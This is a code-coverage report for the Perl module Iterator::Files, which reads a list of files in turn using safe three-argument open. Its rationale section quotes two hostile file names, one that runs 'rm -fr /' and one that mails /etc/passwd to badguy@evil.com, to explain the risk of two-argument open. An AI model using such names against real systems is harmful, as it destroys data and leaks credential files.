File Coverage

blib/lib/Iterator/Files.pm
Criterion Covered Total %
statement 83 92 90.2
branch 40 54 74.0
condition 10 15 66.6
subroutine 12 12 100.0
pod 5 6 83.3
total 150 179 83.8


line stmt bran cond sub pod time code
1             #! perl
2              
3             package Iterator::Files;
4              
5 10     10   33054 use warnings;
  10         18  
  10         310  
6 10     10   52 use strict;
  10         19  
  10         347  
7 10     10   51 use Carp;
  10         16  
  10         7282  
8              
9             =head1 NAME
10              
11             Iterator::Files - Iterate through the contents of a list of files
12              
13             =cut
14              
15             our $VERSION = '0.04';
16             $VERSION =~ tr/_//d;
17              
18             =head1 SYNOPSIS
19              
20             use Iterator::Files;
21              
22             $input = Iterator::Files->new( files => [ "foo", "bar" ] );
23             while ( <$input> ) {
24             ...
25             warn("current file = ", $it->current_file, "\n");
26             }
27              
28             # Alternatively:
29             while ( $input->has_next ) {
30             $line = $input->next;
31             ...
32             }
33              
34             =head1 DESCRIPTION
35              
36             Iterator::Files can be used to retrieve the contents of a series of
37             files as if it were one big file, in the style of the C<< <> >>
38             (Diamond) operator.
39              
40             Just like C<< <> >> it returns the records of all files, one by one,
41             as if it were one big happy file. In-place editing of files is also
42             supported..
43              
44             As opposed to the built-in C<< <> >> operator, no magic is applied to
45             the file names unless explicitly requested. This means that you're
46             protected from file names that may wreak havoc to your system when
47             processed through the magic of the two-argument open() that Perl
48             normally uses for C<< <> >>.
49              
50             Iterator::Files is part of the Iterator-Diamond package.
51              
52             =head1 RATIONALE
53              
54             Perl has two forms of open(), one with 2 arguments and one with 3 (or
55             more) arguments.
56              
57             The 2-argument open is magical. It opens a file for reading or writing
58             according to a leading '<' or '>', strips leading and trailing
59             whitespace, starts programs and reads their output, or writes to their
60             input. A filename '-' is taken to be the standard input or output of
61             the program, depending on whether the file is opened for reading or
62             writing.
63              
64             The 3-argument open is strict. The second argument designates the way
65             the file should be opened, and the third argument contains the file
66             name, taken literally.
67              
68             Many programs read a series of files whose names are passed as command
69             line argument. The diamond operator makes this very easy:
70              
71             while ( <> ) {
72             ....
73             }
74              
75             The program can then be run as something like
76              
77             myprog *.txt
78              
79             Internally, Perl uses the 2-argument open for this.
80              
81             What's wrong with that?
82              
83             Well, this goes horribly wrong if you have file names that trigger the
84             magic of Perl's 2-argument open.
85              
86             For example, if you have a file named ' foo.txt' (note the leading
87             space), running
88              
89             myprog *.txt
90              
91             will surprise you with the error message
92              
93             Can't open foo.txt: No such file or directory
94              
95             This is still reasonably harmless. But what if you have a file
96             '>bar.txt'? Now, silently a new file 'bar.txt' is created. If you're
97             lucky, that is. It can also silently wipe out valuable data.
98              
99             When your system administrator runs scripts like this, malicous file
100             names like 'rm -fr / |' or '|mail < /etc/passwd badguy@evil.com' can
101             be a severe threat to your system.
102              
103             After a long discussion on the perl mailing list it was felt that this
104             security hole should be fixed. Iterator::Files does this by
105             providing a decent iterator that behaves just like C<< <> >>, but with
106             safe semantics.
107              
108             =head1 FUNCTIONS
109              
110             =head2 new
111              
112             Constructor. Creates a new iterator.
113              
114             The iterator can be used by calling its methods, but it can also be
115             used as argument to the readline operator. See the examples in
116             L.
117              
118             B takes an optional series of key/value pairs to control the
119             exact way the iterator must behave.
120              
121             =over 4
122              
123             =item B<< magic => >> { none | stdin | all }
124              
125             C applies three-argument open semantics to all file names and do
126             not use any magic. This is the default behaviour.
127              
128             C is also safe. It applies three-argument open semantics but
129             allows a file name consisting of a single dash C<< - >> to mean the
130             standard input of the program. This is often very convenient.
131              
132             C applies two-argument open semantics. This makes the iteration
133             unsafe again, just like the built-in C<< <> >> operator.
134              
135             =item B<< edit => >> I
136              
137             Enables in-place editing of files, just as the built-in C<< <> >> operator.
138              
139             Unlike the built-in operator semantics, an empty suffix to discard backup
140             files is not supported.
141              
142             =item B<< files => >> I
143              
144             Use this list of files. If this is not specified, uses @ARGV.
145              
146             =back
147              
148             =cut
149              
150             sub new {
151 16     16 1 2258 my ($pkg, %args) = @_;
152 16         170 my $self = bless
153             { _files => \@ARGV,
154             _magic => "none",
155             _init => 0,
156             }, $pkg;
157              
158 16 100       167 if ( exists $args{magic} ) {
159 3         766 $self->{_magic} = lc delete $args{magic};
160 3 50       41 croak($pkg."::new: Invalid value for 'magic' option")
161             unless $self->{_magic} =~ /^none|all|stdin$/;
162             }
163 16 100       67 if ( exists $args{edit} ) {
164 3         246 $self->{_edit} = delete $args{edit};
165 3 100 66     239 croak($pkg."::new: Value for 'edit' option (backup suffix) may not be empty")
166             if defined($self->{_edit}) && $self->{_edit} eq '';
167             }
168 15 50       69 if ( exists $args{files} ) {
169 15         169 $self->{_files} = delete $args{files};
170 15 50       68 croak($pkg."::new: Invalid value for 'files' option")
171             unless ref $self->{_files} eq 'ARRAY';
172 15         43 $self->{_user_files} = 1;
173             }
174 15 50       51 if ( exists $args{record_separator} ) {
175 0         0 $self->{_recsep} = delete $args{record_separator};
176             }
177 15 50       45 if ( exists $args{rs} ) {
178 0         0 $self->{_recsep} = delete $args{rs};
179             }
180 15 50       63 if ( %args ) {
181 0         0 croak($pkg."::new: Unhandled options: "
182             . join(" ", sort keys %args));
183             }
184              
185 15         40 $self->{_current_file} = \my $argv;
186              
187 15         61 return $self;
188             }
189              
190             =head2 next
191              
192             Method, no arguments.
193              
194             Returns the next record of the input stream, or undef if the stream is
195             exhausted.
196              
197             =cut
198              
199             sub next {
200 61     61 1 80 my $self = shift;
201              
202 61         72 while ( 1 ) {
203              
204 77 100       194 unless ( $self->{_init} ) {
205 29 100       174 return unless $self->_advance;
206             }
207              
208 64 50       148 if ( $self->{_init} ) {
209 64         1332854 my $line = readline($self->{_current_fh});
210 64 100       297 return $line if defined $line;
211 16         88 close($self->{_current_fh});
212 16         38 undef($self->{_current_fh});
213 16         130 $self->{_init} = 0;
214 16         24 undef ${ $self->{_current_file} };
  16         57  
215             }
216             }
217             }
218              
219             sub readline {
220 59 100   59 0 295 goto \&next unless wantarray;
221 2         5 my $self = shift;
222 2         4 my @lines;
223 2         652 while ( $self->has_next ) {
224 4         17 push(@lines, $self->next);
225             }
226 2         12 return @lines;
227             }
228              
229             #### WARNING ####
230             # From overload.pm: Even in list context, the iterator is currently
231             # called only once and with scalar context.
232 10     10   24924 use overload '<>' => \&readline;
  10         11627  
  10         85  
233              
234             sub _magic_stdin {
235 1     1   2 my $self = shift;
236 1         4 my $magic = $self->{_magic};
237 1   33     65 return 'stdin' eq $magic || 'all' eq $magic;
238             }
239              
240             sub _advance {
241 35     35   63 my $self = shift;
242              
243 35         64 $self->{_init} = 1;
244              
245 35 100 100     127 if ( defined($self->{_edit}) && defined($self->{_rewrite_fh}) ) {
246 2 50       78 close($self->{_rewrite_fh})
247             or croak("Error rewriting $self->current_file: $!");
248 2         5 undef $self->{_rewrite_fh};
249 2         8 select($self->{_reset_fh});
250             }
251              
252 35         73 while ( 1 ) {
253              
254 35 100       41 unless ( @{ $self->{_files} } ) {
  35         7129  
255 17         56 return;
256             }
257              
258 18         32 ${$self->{_current_file}} = shift(@{ $self->{_files} });
  18         42  
  18         41  
259              
260 18 100 100     8250 if ( $self->{_magic} eq 'all'
      33        
261             || $self->{_magic} eq 'stdin' && $self->current_file eq '-' ) {
262 3 50       20 open($self->{_current_fh}, $self->current_file)
263             or croak("$self->current_file: $!");
264             }
265             else {
266 15 50       631 open($self->{_current_fh}, '<', $self->current_file)
267             or croak("$self->current_file: $!");
268             }
269              
270 18 50       257 if ( eof($self->{_current_fh}) ) {
271 0         0 close $self->{_current_fh};
272 0         0 undef $self->{_current_fh};
273 0         0 undef ${ $self->{_current_file} };
  0         0  
274 0         0 CORE::next;
275             }
276              
277 18 100       69 if ( defined $self->{_edit} ) {
278 2         5 my $fname = $self->current_file;
279 2         4 my $backup = $fname;
280 2 50       9 if ( $self->{_edit} !~ /\*/ ) {
281 2         5 $backup .= $self->{_edit};
282             }
283             else {
284 0         0 $backup =~ s/\*/$fname/g;
285             }
286 2         17 unlink($backup);
287 2 50       138 rename($fname, $backup)
288             or croak("Cannot rename $fname to $backup: $!");
289 2 50       176 open($self->{_rewrite_fh}, '>', $fname)
290             or croak("Cannot create $fname: $!");
291 2         14 $self->{_reset_fh} = select($self->{_rewrite_fh});
292             }
293              
294 18         79 return 1;
295             }
296             }
297              
298             =head2 has_next
299              
300             Method, no arguments.
301              
302             Returns true if the stream is not exhausted. A subsequent call to
303             C will return a defined value.
304              
305             This is the equivalent of the 'eof()' function.
306              
307             =cut
308              
309             sub has_next {
310 12     12 1 23 my $self = shift;
311 12 100       25 !$self->is_eof || $self->_advance;
312             }
313              
314             #use overload 'bool' => \&has_next;
315              
316             =head2 is_eof
317              
318             Method, no arguments.
319              
320             Returns true if the current file is exhausted. A subsequent call to
321             C will open the next file if available and start reading it.
322              
323             This is the equivalent of the 'eof' function.
324              
325             =cut
326              
327             sub is_eof {
328 18     18 1 3534 my $fh = shift->{_current_fh};
329 18 100       184 !defined($fh) || eof($fh);
330             }
331              
332             =head2 current_file
333              
334             Method, no arguments.
335              
336             Returns the name of the current file being processed.
337              
338             =cut
339              
340             sub current_file {
341 27     27 1 1166 ${ shift->{_current_file} };
  27         761  
342             }
343              
344             =head1 LIMITATIONS
345              
346             Even in list context, the iterator C<< <$input> >> is currently called
347             only once and with scalar context. This will not work as expected:
348              
349             my @lines = <$input>;
350              
351             This reads all remaining lines:
352              
353             my @lines = $input->readline;
354              
355             =head1 SEE ALSO
356              
357             L, open() in L, L.
358              
359             =head1 AUTHOR
360              
361             Johan Vromans, C<< >>
362              
363             =head1 BUGS
364              
365             Please report any bugs or feature requests to C
366             at rt.cpan.org>, or through the web interface at
367             L. I
368             will be notified, and then you'll automatically be notified of
369             progress on your bug as I make changes.
370              
371             =head1 SUPPORT
372              
373             You can find documentation for this module with the perldoc command.
374              
375             perldoc Iterator::Files
376              
377             You can also look for information at:
378              
379             =over 4
380              
381             =item * RT: CPAN's request tracker
382              
383             L
384              
385             =item * CPAN Ratings
386              
387             L
388              
389             =item * Search CPAN
390              
391             L
392              
393             =back
394              
395             =head1 ACKNOWLEDGEMENTS
396              
397             This package was inspired by a most interesting discussion of the
398             perl5-porters mailing list, July 2008, on the topic of the unsafeness
399             of two-argument open() and its use in the C<< <> >> operator.
400              
401             =head1 COPYRIGHT & LICENSE
402              
403             Copyright 2008 Johan Vromans, all rights reserved.
404              
405             This program is free software; you can redistribute it and/or modify it
406             under the same terms as Perl itself.
407              
408             =cut
409              
410             1; # End of Iterator::Files
411              
412             __END__